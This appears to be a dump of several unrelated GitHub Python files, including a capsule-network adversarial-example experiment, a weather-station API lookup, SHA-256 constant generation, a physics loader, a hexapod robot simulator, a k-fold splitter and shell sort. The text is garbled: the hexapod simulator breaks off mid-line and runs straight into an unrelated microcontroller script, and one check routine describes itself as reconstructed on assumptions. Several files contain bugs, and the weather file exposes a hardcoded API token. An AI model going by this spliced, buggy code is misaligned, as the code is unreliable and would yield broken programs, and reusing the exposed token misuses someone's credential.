()\n\n entropy = _compute_entropy(pred)\n\n # winning capsule mask\n win_cap_mask = np.array([0.0 for _ in range(10)])\n win_cap_mask[pred_cl] = 1.0 \n win_cap_mask = np.expand_dims(win_cap_mask, axis=0)\n # all capsules mask\n all_cap_mask = np.expand_dims(np.array([1.0 for _ in range(10)]), axis=0)\n\n pred_class_prob_list.append(pred)\n pred_class_entropy_list.append(entropy)\n\n ga_iter_matr = np.array(iter_n_recorded)\n 
ga_img_matr = np.stack(ga_img_list, axis=0)\n pred_class_prob_matr = np.stack(pred_class_prob_list)\n pred_class_entropy_matr = np.stack(pred_class_entropy_list, axis=0)\n\n # save to npz file\n npzfname = 'instance_{}-cap_{}-dim_{}.npz'.format(i, j, k)\n npzfname = os.path.join(write_dir, npzfname)\n np.savez(npzfname, iters=ga_iter_matr, images=ga_img_matr, pred=pred_class_prob_matr,\n pred_entropy=pred_class_entropy_matr)\n\n print('{0} {1} total:class:gradient = {2:.1f}% ~ {3:.1f}% ~ {4:.1f}%'.format(\n ' '*5, '-'*5, \n 100.0*(i * num_class_loop * n_repeats + j * n_repeats + k + 1) / (max_epochs * num_class_loop * n_repeats),\n 100.0*(j * n_repeats + k + 1)/(num_class_loop * n_repeats),\n 100.0*(k + 1)/n_repeats), end='\\r')\n except tf.errors.OutOfRangeError:\n break\n print()\n\ndef explore_direction_aspect(num_gpus, data_dir, dataset, image_size,\n total_batch_size, summary_dir, max_epochs,\n iter_n, step, threshold, aspect_type):\n \"\"\"Start direction aspect exploration. Producing results to summary_dir.\n\n Args:\n num_gpus: number of GPUs available to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiments;\n image_size: image size after cropping or resizing;\n total_batch_size: total batch size, ≡ 1;\n summary_dir: the directory to write files;\n max_epochs: number of different instance for the same class;\n iter_n: number of iterations to add gradients to original image;\n step: step size of each iteration of gradient ascent to mutliply;\n threshold: any gradients less than this value will not be added to the original image;\n aspect_type: 'naive_max_caps_dim', 'max_caps_dim_diff', or 'noise_naive_max_caps_dim', 'max_caps_dim_diff'.\n \"\"\"\n # define load_dir and summary_dir\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, aspect_type)\n # delare an empty model graph\n with tf.Graph().as_default():\n # call run direction aspect\n run_direction_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type)\n\ndef main(_):\n hparams = default_hparams()\n if FLAGS.hparams_override:\n hparams.parse(FLAGS.hparams_override)\n \n if FLAGS.mode == 'train':\n train(hparams, FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.model, FLAGS.total_batch_size, FLAGS.image_size, \n FLAGS.summary_dir, FLAGS.save_epochs, FLAGS.max_epochs)\n if FLAGS.mode == 'test':\n test(FLAGS.split, FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.total_batch_size, FLAGS.image_size, FLAGS.summary_dir, FLAGS.max_epochs)\n elif FLAGS.mode == 'evaluate':\n evaluate(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.model, FLAGS.total_batch_size, FLAGS.image_size,\n FLAGS.threshold, FLAGS.summary_dir, FLAGS.max_epochs)\n elif FLAGS.mode == 'glitch':\n pass\n elif FLAGS.mode in NORM_ASPECT_TYPES or FLAGS.mode in ['noise_' + aspect for aspect in NORM_ASPECT_TYPES]:\n explore_norm_aspect(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.image_size,\n FLAGS.total_batch_size, FLAGS.summary_dir, FLAGS.max_epochs,\n FLAGS.iter_n, float(FLAGS.step), float(FLAGS.threshold),\n FLAGS.mode)\n elif FLAGS.mode in DIRECTION_ASPECT_TYPES or FLAGS.mode in ['noise_' + aspect for aspect in DIRECTION_ASPECT_TYPES]:\n explore_direction_aspect(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.image_size,\n FLAGS.total_batch_size, FLAGS.summary_dir, FLAGS.max_epochs,\n FLAGS.iter_n, float(FLAGS.step), float(FLAGS.threshold),\n FLAGS.mode)\n 
else:\n raise ValueError(\"No matching mode found for '{}'\".format(FLAGS.mode))\n\nif __name__ == '__main__':\n tf.app.run()\n ","repo_name":"HAXRD/Capsule-Specific-Attacks","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":37434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11831229185","text":"import urllib.parse\nimport requests\nimport pandas as pd\n\ntoken = '0939c8c78a5a460e8685922d985d500f' # API token\noutput = 'json' # Output format\n\ndef closest_station(latitude, longitude):\n\n #########################################################\n ## Find closest weather station to turbine coordinates ##\n #########################################################\n radius = '20'\n\n # Station metadata API URL\n metadata_api = 'https://api.synopticlabs.org/v2/stations/metadata?&'\n\n # URL to be sent to API\n url = metadata_api + urllib.parse.urlencode({'token': token,\n 'output': output,\n 'radius': str(latitude)+','+str(longitude)+','+radius,\n 'status': 'active',\n 'limit': '10',\n 'vars': 'wind_speed,wind_gust,wind_direction,peak_wind_speed'})\n\n # API GET request\n json_data = requests.get(url).json()\n json_number_of_stations = json_data['SUMMARY']['NUMBER_OF_OBJECTS']\n station_id = []\n station_distance = []\n station_index = []\n\n for i in range(0, int(json_number_of_stations)):\n json_period_start = json_data['STATION'][i]['PERIOD_OF_RECORD']['start']\n json_period_end = json_data['STATION'][i]['PERIOD_OF_RECORD']['end']\n json_station_id = json_data['STATION'][i]['STID']\n json_station_distance = json_data['STATION'][i]['DISTANCE']\n if (int(json_period_end[:-16]) - int(json_period_start[:-16])) >= 9:\n station_distance.insert(i,json_station_distance)\n station_id.insert(i,json_station_id)\n station_index.insert(i,i)\n if not station_distance:\n print('No weather stations within ' + radius + ' miles have 10 years of wind speed data, try increasing range.')\n quit()\n\n min_station_distance = min(station_distance)\n min_station_distance_idx = station_distance.index(min_station_distance)\n closest_station = station_id[min_station_distance_idx]\n \n return closest_station\n\n#print(closest_station(43.26304252,-77.06442432))","repo_name":"Bodei/windapp","sub_path":"closest_station.py","file_name":"closest_station.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22338245366","text":"import time,math\n\nclass Constants:\n def __init__(self):\n self.constants()\n\n\n def constants(self):\n numPrimes = 0 \n num = 2\n primeNums = []\n while numPrimes < 64:\n for i in range(2,num):\n if (num % i) == 0:\n num += 1\n break\n else:\n numPrimes += 1\n primeNums.append(num)\n num += 1\n\n constants = []\n for i,p in enumerate(primeNums):\n time.sleep(0.15)\n cubedPrime = str(p**(1./3.))\n print(str(i) + \" = \" + \"∛{}\".format(p) + \" = \" + cubedPrime,end='\\r')\n \n cubedPrime = float(cubedPrime)\n fractional = cubedPrime - math.floor(cubedPrime)\n \n time.sleep(0.15)\n print(str(i) + \" = \" + \"∛{}\".format(p) + \" = \" + str(fractional),end='\\r')\n\n constant = bin(math.floor(fractional*2**32)).lstrip('-0b')\n constant = (32-len(constant))*'0' + constant\n time.sleep(0.15)\n print(str(i) + \" = \" + str(constant))\n constants.append(constants)\n\n\n\n return 
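The station lookup above builds its request by concatenating a base URL with `urllib.parse.urlencode`. A minimal illustration of that step alone; the token and coordinates are placeholders, not working credentials:

```python
import urllib.parse

base = 'https://api.synopticlabs.org/v2/stations/metadata?&'
params = {'token': '<YOUR_TOKEN>', 'output': 'json',
          'radius': '43.263,-77.064,20', 'status': 'active'}
print(base + urllib.parse.urlencode(params))
```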
constants\n\n\n\n\n\n\n\n\n\nConstants()\n\n","repo_name":"ivan-fediaev/sha256-python","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18922798026","text":"# MultiThreading is a techniqu which allow a cpu to \n# excute Multipal Threads of one process\n# run Multipal task and funations at the same time .\n# single threading and mulitpal threading\n# thread class methods \n# rUn(), start(),join(), isalive(), setname(), getname()\n# class A:\n# def run(self):\n# for i in range(5):\n# print(\"ankit Singh\")\n# class B:\n# def run(self):\n# for i in range(5):\n# print(\"shivi singh\") \n# t1=A()\n# t2=B()\n# t1.run()\n# t2.run() \n\n# from time import sleep\n# class A:\n# def run(self):\n# for i in range(5):\n# print(\"ankit Singh\")\n# sleep(1)\n# class B:\n# def run(self):\n# for i in range(5):\n# print(\"shivi singh\")\n# sleep(1)\n# t1=A()\n# t2=B()\n# t1.run()\n# t2.run() \n\nfrom threading import Thread\nclass A(Thread):\n def run(self):\n for i in range(5):\n print(\"ankit Singh\")\nclass B(Thread):\n def run(self):\n for i in range(5):\n print(\"shivi singh\")\nt1=A()\nt2=B()\nt1.start()\nt2.start() ","repo_name":"ankit-singh1718190/python-learn","sub_path":"MultiThreading.py","file_name":"MultiThreading.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15259687987","text":"from panda3d.bullet import *\nfrom panda3d.core import *\n\norder = 100\ntarget = 'object'\n\ndef get_used_materials(geom_np):\n materials = []\n geom_node = geom_np.node()\n for i, geom in enumerate(geom_node.getGeoms()):\n use_geom = True\n gs = geom_node.getGeomState(i)\n m_att = gs.getAttrib(MaterialAttrib)\n if m_att: \n materials.append(m_att.getMaterial().getName())\n return materials\n\ndef make_bullet_mesh(scene, m_type, geom_np):\n mesh = m_type()\n geom_node = geom_np.node()\n for i, geom in enumerate(geom_node.getGeoms()):\n use_geom = True\n gs = geom_node.getGeomState(i)\n m_att = gs.getAttrib(MaterialAttrib)\n if m_att:\n m_name = m_att.getMaterial().getName()\n m_data = scene.data_dict['materials'][m_name]\n if not m_data['use_physics']:\n use_geom = False\n if use_geom:\n mesh.addGeom(geom)\n return mesh\n\ndef make_collision_bounds_shape(scene, obj, dynamic=True):\n shapes_grp2 = {'CYLINDER':BulletCylinderShape, \n 'CAPSULE':BulletCapsuleShape, \n 'CONE':BulletConeShape}\n \n shapes_grp3 = {'CONVEX_HULL':BulletConvexHullShape, \n 'TRIANGLE_MESH':BulletTriangleMeshShape}\n \n if obj['phys_collision_bounds'] == 'BOX':\n shape = BulletBoxShape(Vec3(*obj['phys_bb']))\n elif obj['phys_collision_bounds'] == 'SPHERE':\n shape = BulletSphereShape(max(obj['phys_bb']))\n elif obj['phys_collision_bounds'] in shapes_grp2.keys():\n # CYLINDER, CAPSULE, CONE\n radius = max(obj['phys_bb'][0], obj['phys_bb'][1])\n if obj['phys_collision_bounds'] == 'CAPSULE':\n height = obj['phys_bb'][2]\n else:\n height = obj['phys_bb'][2]*2\n sfunc = shapes_grp2[obj['phys_collision_bounds']]\n shape = sfunc(radius, height, ZUp)\n elif obj['phys_collision_bounds'] == 'TRIANGLE_MESH':\n mesh = make_bullet_mesh(scene, BulletTriangleMesh, scene.meshes[obj['name']])\n shape = BulletTriangleMeshShape(mesh, dynamic=dynamic)\n elif obj['phys_collision_bounds'] == 'CONVEX_HULL':\n shape = make_bullet_mesh(scene, BulletConvexHullShape, scene.meshes[obj['name']])\n else:\n raise 
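The `Constants` class above derives each value from the fractional part of a prime's cube root, scaled to 32 bits, which is exactly how the SHA-256 round constants are defined; note, though, that `constants.append(constants)` appends the list to itself rather than the computed `constant`, which looks like a typo. A one-prime spot check (the hex formatting is mine):

```python
import math

frac = 2 ** (1.0 / 3.0) % 1.0            # fractional part of the cube root of 2
print(hex(math.floor(frac * 2**32)))     # -> 0x428a2f98, the first SHA-256 round constant
```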
Exception('Unknown collision bound: %s' % obj['phys_collision_bounds'])\n \n shape.setMargin(obj['phys_collision_margin'])\n \n return shape\n \n\n\ndef invoke(scene, obj, action):\n\n if action == 'LOAD':\n \n node = BulletRigidBodyNode(obj['name'])\n shape = None\n if obj['phys_type'] == 'STATIC':\n if 'phys_collision_bounds' in obj:\n shape = make_collision_bounds_shape(scene, obj, dynamic=False)\n else:\n if obj['type'] == 'MESH':\n mesh = make_bullet_mesh(scene, BulletTriangleMesh, scene.meshes[obj['name']])\n shape = BulletTriangleMeshShape(mesh, dynamic=False)\n \n elif obj['phys_type'] == 'RIGID_BODY':\n if 'phys_collision_bounds' in obj:\n shape = make_collision_bounds_shape(scene, obj)\n else:\n shape = BulletSphereShape(obj['phys_radius'])\n \n node.setMass(obj['phys_mass'])\n\n\n if shape:\n node.addShape(shape)\n\n if 'phys_mat_order' in obj and obj['phys_mat_order']:# and not 'phys_collision_bounds' in obj:\n for m_name in obj['phys_mat_order']:\n mat = scene.data_dict['materials'][m_name]\n if mat['use_physics']:\n node.set_friction(mat['phys_friction'])\n node.set_restitution(mat['phys_elasticity'])\n break\n else:\n node.set_friction(1.0)\n \n # Sleepeng (deactivation) options\n if obj['phys_deactivation']:\n scene_data = scene.data_dict['scene']\n node.set_angular_sleep_threshold(scene_data['phys_deactivation_angular_threshold'])\n node.set_linear_sleep_threshold(scene_data['phys_deactivation_linear_threshold'])\n node.set_deactivation_time(scene_data['phys_deactivation_time'])\n node.set_active(True)\n else:\n node.set_deactivation_enabled(False)\n\n\n if 'phys_friction_coefficients' in obj:\n node.set_anisotropic_friction(Vec3(*obj['phys_friction_coefficients']))\n \n # Linear and angular damping\n node.set_linear_damping(obj['phys_linear_damping'])\n node.set_angular_damping(obj['phys_angular_damping'])\n #node.set_inertia(0.9)\n \n # Linear and angular locking\n if True in obj['phys_lock_location']:\n v = Vec3(*map(int, obj['phys_lock_location']))\n node.set_linear_factor(v)\n if True in obj['phys_lock_rotation']:\n v = Vec3(*map(int, obj['phys_lock_rotation']))\n node.set_angular_factor(v)\n \n np = scene.root.attachNewNode(node)\n \n mask = BitMask32()\n for i,val in enumerate(obj['phys_collision_mask']):\n if val: mask.set_bit(i)\n np.set_collide_mask(mask)\n \n np.setMat(scene.meshes[obj['name']].getMat())\n\n scene.meshes[obj['name']].wrtReparentTo(np)\n scene.phys_world.attachRigidBody(node)\n \n scene.objects[obj['name']] = np\n\n if obj['invisible']:\n scene.meshes[obj['name']].hide()\n","repo_name":"09th/Blender4Panda-loader","sub_path":"ext/phys_object.py","file_name":"phys_object.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74142993106","text":"# -^- coding:utf-8 -^-\n\"\"\"\n使用方法:\nimport toyrep as vrep\nN=5\n别的不变\n\n说明\n该文件主要由两部分构成,一部分是针对六足机器人的定义以及模型中一些物体的定义,一部分是针对vrep的API函数\n\n文件执行过程:\nimport时初始化\n调用了setobjectPosition类似的东西时会保存一个相对参考系的值(比如腿相对身体的值),后面再一并更新\n会在simxSynchronousTrigger 被调用的时候更新所有物体的状态,以及检查碰撞(现在的逻辑是碰到了就爆炸),还有可视化\n\n定义部分:\n基类:rep_obj, 负责管理handle,name,parent等等信息\n每个类都要有 refresh draw collision_check reset这几个函数,\n\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nimport numpy as np\nimport time\nfrom actorcritic.config import *\nfrom actorcritic import Tlogger\nfrom actorcritic.terrianMap import heightMap\n\nWORLD_SIZE = [-5,5]\n\nNAME = {} # name -> handle\nHANDLE = {}# handle -> 
obj\nH_count = 0\ntlogger = Tlogger\nprint(tlogger)\n#whether make sure that the body position is near the middle of the fixed legs\n\nterrianContactBallheight = 0.025\n\n# DISPLAY = True\n\n\ndef Handle(obj):\n global H_count\n H_count+=1\n HANDLE[H_count]=obj\n return H_count\n\ndef topology(x,y):\n if MAP==\"fence\":\n for f in FENCE:\n if(abs(x-f.x)<=f.r):\n return f.h\n return 0\n \n # height = 0\n height = heightMap(x,y)\n for c in CLDS:\n if((x-c.loc[0])**2+(y-c.loc[1])**2<= c.size**2):\n height = max(height,c.size)\n \n return height\n\nTOPO = topology\n\n\ndef turnVec(vec,deg):\n \"\"\"\n Get the vector after turned the vec some degree\n \"\"\"\n assert(vec.shape==(3,))\n return np.array([\n vec[0]*np.cos(deg) - vec[1]*np.sin(deg),\n vec[0]*np.sin(deg) + vec[1]*np.cos(deg),\n vec[2]\n ])\n\ndef distance(vec1,vec2):\n return np.sqrt(np.sum(((vec1-vec2)**2)))\n\ndef diff_ang(vec1,vec2):\n ang = math.atan2(vec1[1],vec1[0])-math.atan2(vec2[1],vec2[0])\n if(ang<-math.pi):\n ang+= math.pi\n elif (ang>math.pi):\n ang-=math.pi\n return ang\n\ndef ave_ang(angs):\n angs = np.array(angs)\n x = np.cos(angs)\n y = np.sin(angs)\n return math.atan2(np.sum(y),np.sum(x))\n\nclass rep_obj:\n def __init__(self,name,parent):\n if(type(name)!=list):\n name=[name]\n self.handle=[]\n for n in name:\n h = Handle(self)\n self.handle.append(h)\n NAME[n] = h\n self.parent = parent\n self.state = True\n\nclass Botnode(rep_obj):\n def __init__(self,loc,name,parent):\n self.p=np.array(loc) #the position in BCS\n assert(self.p.shape==(3,))\n super(Botnode, self).__init__(name,parent)\n # print(self.p,parent.toGlob(self.p))\n self.parent = parent\n self.loc = parent.loc + parent.toGlob(self.p) # the position in -1\n \n def reset(self,loc):\n self.p=np.array(loc)\n self.loc = self.parent.loc + self.parent.toGlob(self.p)\n self.state = True\n\n def fixed(self):\n return self.loc[2] <= TOPO(self.loc[0],self.loc[1]) + 0.005 + terrianContactBallheight\n\nbasAng = [1,3,5,-1,-3,-5]\nbasAng = np.array(basAng)*math.pi/6\n\n\nclass Hexpod(rep_obj):\n def __init__(self,reset = False):\n self.ori = 0\n height = 4.4652e-01 +terrianContactBallheight\n self.loc = np.array([0,0,height])\n if(not reset):\n self.loc_sol = [] # the location get solving one constraints, for debugging\n self.ori_sol = []\n super(Hexpod, self).__init__(\"BCS\",None)\n self.tips=[]\n self.state = True\n\n tip_start_loc = [[ 5.27530670e-01 , 3.04633737e-01 ,-height],\n [-2.28881836e-05 , 6.09106421e-01 ,-height],\n [-5.27527809e-01 , 3.04500699e-01 ,-height],\n [ 5.27622223e-01 ,-3.04508090e-01 ,-height],\n [ 1.44958496e-04 ,-6.09171569e-01 ,-height],\n [-5.27413368e-01 ,-3.04654479e-01 ,-height]]\n for i,loc in enumerate(tip_start_loc):\n if(not reset):\n self.tips.append(Botnode(loc,['TipTarget'+str(i+1),'Tip'+str(i+1)],self))\n else:\n self.tips[i].reset(loc)\n if(not reset):\n self.shape_nodes=[]\n #shape_nodes 用于在画图时画出机器人身体形状\n u1_loc = [[ 1.31711960e-01, 7.59007931e-02 ,-1.78813934e-06],\n [ 1.38759613e-04, 1.51954651e-01 ,-1.78813934e-06],\n [-1.31512642e-01, 7.60353804e-02, -1.72853470e-06],\n [ 1.31635189e-01, -7.60723352e-02 ,-1.84774399e-06],\n [-1.66893005e-05, -1.51991248e-01 ,-1.90734863e-06],\n [-1.31590843e-01, -7.59376287e-02 ,-1.78813934e-06]]\n u2_loc = [[ 0.27454329 , 0.0521549 ,0.11723149],\n [ 0.09211826 , 0.26377678 ,0.11723149],\n [-0.18236399 , 0.21160328 ,0.11723131],\n [ 0.1824851 ,-0.21164024 ,0.11723143],\n [-0.09199619 ,-0.2638135 ,0.11723149],\n [-0.27442122 ,-0.05219185 ,0.11723137]]\n u3_loc = [[ 0.18251514 , 0.21148705 
,0.11723095],\n [-0.0918808 , 0.26374376 ,0.11723089],\n [-0.27433491 , 0.05223811 ,0.11723095],\n [ 0.27445745 ,-0.05227506 ,0.11723095],\n [ 0.09200335 ,-0.26378036 ,0.11723101],\n [-0.18239307 ,-0.21152413 ,0.11723095]]\n\n for i,loc in enumerate(u1_loc):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'Hip'+str(i+1),self))\n else:\n self.shape_nodes[i].reset(loc)\n \n if(not reset):\n self.shape_nodes.append(Botnode(u2_loc[0],'J21R',self))\n else:\n self.shape_nodes[6].reset(u2_loc[0])\n for i,loc in enumerate(u2_loc[1:]):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'J21R'+str(i-1),self))\n else:\n self.shape_nodes[7+i].reset(loc)\n \n if(not reset):\n self.shape_nodes.append(Botnode(u3_loc[0],'J31R',self))\n else:\n self.shape_nodes[12].reset(u3_loc[0])\n for i,loc in enumerate(u3_loc[1:]):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'J31R'+str(i-1),self))\n else:\n self.shape_nodes[13+i].reset(loc)\n\n def reset(self):\n self.__init__(reset=True)\n\n def toGlob(self,vec):\n \"\"\"\n Convert a vector from the body coordinate system to the world coordinate system\n \"\"\"\n return turnVec(vec,self.ori)\n\n def explode(self):\n for t in self.tips:\n t.p*=1000000\n t.loc*=1000000\n t.state = False\n self.state = False\n self.loc = np.array([1e+22]*3)\n # for t in self.shape_nodes:\n # t.state = False\n \n def draw(self,ax):\n for i,t in enumerate(self.tips):\n # ax.plot([self.loc[0],t.loc[0]],\n # [self.loc[1],t.loc[1]],\n # [self.loc[2],t.loc[2]],\n # \"-r\")\n for j in range(i,len(self.shape_nodes),6):\n ax.plot([self.shape_nodes[j].loc[0],t.loc[0]],\n [self.shape_nodes[j].loc[1],t.loc[1]],\n [self.shape_nodes[j].loc[2],t.loc[2]],\n \"-b\")\n x = []\n y = []\n z = []\n for i in range(len(self.shape_nodes)):\n x.append(self.shape_nodes[i].loc[0])\n y.append(self.shape_nodes[i].loc[1])\n z.append(self.shape_nodes[i].loc[2])\n ax.plot(x,y,z,\"-b\")\n # draw orientation\n for i in self.ori_sol:\n orivec = np.array([math.cos(i),math.sin(i)]) * 0.5\n ax.plot([self.loc[0],self.loc[0]+orivec[0]],\n [self.loc[1],self.loc[1]+orivec[1]],\n 0.646,\n \"-r\")\n i = self.ori\n orivec = np.array([math.cos(i),math.sin(i)]) * 0.5\n ax.plot([self.loc[0],self.loc[0]+orivec[0]],\n [self.loc[1],self.loc[1]+orivec[1]],\n 0.646,\n \"-g\")\n\n def printState(self):\n print(\"t.loc | t.p\")\n for t in self.tips:\n print(t.loc,t.p)\n print(\"self.loc\",self.loc,\"self.ori\",self.ori)\n\n def refresh(self):\n \"\"\"\n The refresh procedure: first determine the body height (assuming the first two\n Euler angles of the body are always 0), then determine which feet are on the\n ground, then determine the body coordinates, and finally derive all other coordinates.\n \"\"\"\n # solve the position of the body\n\n # refresh the height\n if(not self.state):\n return \n\n self.loc_sol = []\n self.ori_sol = []\n for t in self.tips:\n if(t.fixed()):\n newloc = t.loc - t.p # as the height has no influence on the angle\n self.loc_sol.append(newloc)\n\n # guard against \"Error: zero-size array to reduction operation maximum which has no identity\"\n if(len(self.loc_sol)==0):\n print(\"ERROR, self.loc_sol empty \\n DATA: \\n\")\n self.printState()\n self.explode()\n return\n\n \n self.loc[2] = np.max(np.array(self.loc_sol),axis=0)[2]\n for t in self.tips:\n t.loc[2] = self.loc[2] + t.p[2]\n\n # refresh the ori\n for t in self.tips:\n if(t.fixed()):\n dif_loc = t.loc-self.loc\n ori = diff_ang(dif_loc,t.p)\n self.ori_sol.append(ori)\n self.ori = ave_ang(self.ori_sol)\n\n # refresh the loc of all nodes\n self.loc_sol = []\n for t in self.tips:\n if(t.fixed()):\n newloc = t.loc - self.toGlob(t.p)\n self.loc_sol.append(newloc)\n self.loc = np.average(np.array(self.loc_sol),axis = 0)\n \n for t in self.tips:\n t.loc = self.loc + self.toGlob(t.p)\n 
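 # the cosmetic shape nodes follow the body rigidly, so apply the same pose to them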
for t in self.shape_nodes:\n t.loc = self.loc+ self.toGlob(t.p)\n \n def check_line_collision(self,start,end):\n num = 10\n X = np.linspace(start[0],end[0],num)\n Y = np.linspace(start[1],end[1],num)\n Z = np.linspace(start[2],end[2],num)\n for x,y,z in zip(X,Y,Z):\n if(z < TOPO(x,y)):\n return True\n return False\n\n def check(self,FOOT_ORDER=True,TIPS_distance=True,SAFE_ANGLE=True,FOOTRANGE=None):\n if(FOOT_ORDER):\n # reconstructed check: each foot should keep its angular order; the method\n # header and the (4-i)*math.pi/3 upper bound are assumptions\n for i in range(6):\n if((4-i)*math.pi/3 > math.atan2(self.tips[i].p[1],self.tips[i].p[0]) > (2-i)*math.pi/3):\n print(\"CHECK FOOT ORDER\",i)\n self.printState()\n self.explode()\n tlogger.dist[\"foot_order\"] = tlogger.dist.get(\"foot_order\",0)+1\n # print(\"TLOGGER keys\",tlogger.dist.keys())\n break\n if(TIPS_distance):\n # the angular gap between adjacent feet should be large enough\n orders = [0,1,2,5,4,3,0]\n for i in range(6):\n if(not (0.1 < (math.atan2(self.tips[orders[i+1]].p[1],self.tips[orders[i+1]].p[0]) \n - math.atan2(self.tips[orders[i]].p[1],self.tips[orders[i]].p[0]))%(math.pi*2) < 2)):\n print(\"CHECK FOOT DISTANCE \",i)\n tlogger.dist[\"foot_ang_distance\"] = tlogger.dist.get(\"foot_ang_distance\",0)+1\n # print(\"TLOGGER keys\",tlogger.dist.keys())\n self.printState()\n self.explode()\n break\n \n if(SAFE_ANGLE):\n ang = np.zeros(6)\n for i in range(0,6):\n ang[i] = math.atan2(self.tips[i].p[1],self.tips[i].p[0])\n deg = ave_ang(ang-basAng)\n if(abs(deg)>0.8):\n print(\"BODY TWIST\")\n self.printState()\n self.explode()\n\n if(FOOTRANGE):\n for i,t in enumerate(self.tips):\n if(not (FOOTRANGE[0] 15 * 1000:\n logger_main.debug(\"Motor run timeout\")\n on_released()\n # if web_server.is_web_server_thread_running():\n last_request, last_request_time = web_server.get_last_request()\n if last_request != \"\" and last_request_time != last_time:\n last_time = last_request_time\n logger_main.info(\"Last request\" + last_request)\n # else:\n # if not triggered_message:\n # log_message(\"Web server thread is not running.\")\n # triggered_message = True\n # # sys.exit()\n\nexcept KeyboardInterrupt as e:\n logger_main.exception(str(e))\n sys.exit()\n","repo_name":"pskyvader/pico_curtains","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"31701070127","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport os\n\n\ndef k_fold_data(X, y, name, k):\n kf = KFold(n_splits=k)\n c = 0\n for train_index, test_index in kf.split(X):\n # print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n c += 1\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n # storing k_fold data on their dir\n save_k_fold_split([X_train, y_train], [X_test, y_test], name, str(c))\n\n\ndef save_k_fold_split(train, test, name, count):\n # now save data to csv file with iteration of k fold and dataset name\n # 1. Create a folder named after the dataset\n # 2. subfolder using name_k1\n # 3. 
inside name_kCount store the csv files as name_k1_train, name_k2_train\n # raw folder contains the pure files after the k fold split into test and train\n # model contains doc2vec model\n # embedding contains inference vectors for both test and train\n root_folder = \"data/\"\n data_name_folder = root_folder + name + \"/\"\n k_data_name_folder = data_name_folder + \"k\" + count + \"/raw/\"\n raw_name_train = \"raw_\"+name + \"_k\" + count + \"_train.csv\"\n raw_name_test = \"raw_\"+name + \"_k\" + count + \"_test.csv\"\n\n if ensure_dir(k_data_name_folder):\n # create dataframes for test and train and save them inside the raw folder of each k fold\n train_df = pd.DataFrame(np.column_stack([train[0], train[1]]), \n columns=['text', 'label'])\n test_df = pd.DataFrame(np.column_stack([test[0], test[1]]), \n columns=['text', 'label'])\n # saving data frame\n train_df.to_csv(k_data_name_folder + raw_name_train, index=False)\n test_df.to_csv(k_data_name_folder + raw_name_test, index=False)\n\n print(\"File saved:\", name, count, raw_name_train, raw_name_test)\n\n\ndef ensure_dir(file_path):\n directory = os.path.dirname(file_path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n print(\"{} folder is created\".format(directory))\n return True\n else:\n print(\"{} folder already exists\".format(directory))\n return True\n\n\ndef split_data(data_list, k):\n # if a single dataset string is given, convert it to a list\n if not type(data_list) == list:\n data_list = data_list.split(\",\")\n # looping for every dataset\n for name in data_list:\n data_location = \"data/\"+name+\".csv\"\n\n if os.path.exists(data_location):\n df = pd.read_csv(data_location)\n X = np.array(df[df.columns[:-1]].values.tolist())\n y = np.array(df[df.columns[-1]].values.tolist())\n k_fold_data(X, y, name, k)\n else:\n print(\"{} file or path doesn't exist\".format(data_location))\n\n# use ',' to separate datasets (without whitespace) or pass a list\n# data = \"circle,3rd\"\n# split_data(data)","repo_name":"subashale/random_mvdt","sub_path":"prepare_features/kfold_data_split.py","file_name":"kfold_data_split.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"23101842147","text":"\"\"\"\nshell sort\n\"\"\"\n\nfrom strategy import SortStrategy\n\nclass ShellSort(SortStrategy):\n def sort(self, elements):\n self.shellsort(elements)\n print('Shell sorted')\n\n def shellsort(self, array):\n \"Shell sort using Shell's (original) gap sequence: n/2, n/4, ..., 1.\"\n gap = len(array) // 2\n # loop over the gaps\n while gap > 0:\n # do the insertion sort\n for i in range(gap, len(array)):\n val = array[i]\n j = i\n while j >= gap and array[j - gap] > val:\n array[j] = array[j - gap]\n j -= gap\n array[j] = val\n gap //= 2\n","repo_name":"Sunhick/design-patterns","sub_path":"Behavioral/Strategy/shellsort.py","file_name":"shellsort.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
